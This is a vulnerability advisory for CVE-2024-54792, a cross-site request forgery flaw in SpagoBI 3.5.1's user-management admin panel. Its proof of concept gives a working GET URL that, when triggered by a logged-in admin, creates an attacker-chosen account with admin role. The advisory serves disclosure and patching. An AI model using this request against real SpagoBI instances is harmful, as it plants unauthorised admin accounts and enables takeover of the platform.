SpagoBI 3.5.1 Cross Site Request Forgery

# CVE-2024-54792
    
    **Severity :** **Medium** (**6.1**)
    
    **CVSS score :** `CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N` 
    
    ## Summary :
    Engineering Ingegneria Informatica **SpagoBI** version **3.5.1** is affected by **CSRF** in the admin panel that manages user grants.
    
    ## Poc
    The add/edit/delete user panel, accessible by the admin user, do not contains csrf countermeasures.
    ### Steps to Reproduce :
    1. Embed this url customizing it with: **host**, **custom_username** and **custom_password** and into HTML page that makes the request and trick a victim with admin rights logged into the page to visit it. A new user will be created in the platform.
    ```
    https://<host>/SpagoBI/servlet/AdapterHTTP?ACTION_NAME=MANAGE_USER_ACTION&SBI_EXECUTION_ID=-1&LIGHT_NAVIGATOR_DISABLED=TRUE&MESSAGE_DET=USER_INSERT&_dc=1727100301044&userId=<custom_username>&fullName=<custom_username>&id=0&pwd=<custom_password>&userRoles=%5B%7B%22name%22%3A%22%2Fspagobi%2Fadmin%22%2C%22id%22%3A5%2C%22description%22%3A%22%2Fspagobi%2Fadmin%22%2C%22checked%22%3Atrue%7D%5D&userAttributes=%5B%5D
    ```
    
    ## Affected Version Details :
    
    - <= 3.5.1
    
    ## Impact :
    
    The attacker can trick a victim logged with admin rights to perform a GET request that inserts a user with ad hoc credentials in the platform unconsciously, due to the lack of CSRF countermeasures. Then he can log in with the previously selected credentials. 
    
    ## Mitigation :
    
    -  Update to the latest version.
      
    ## References :
    - (https://nvd.nist.gov/vuln/detail/CVE-2024-54792)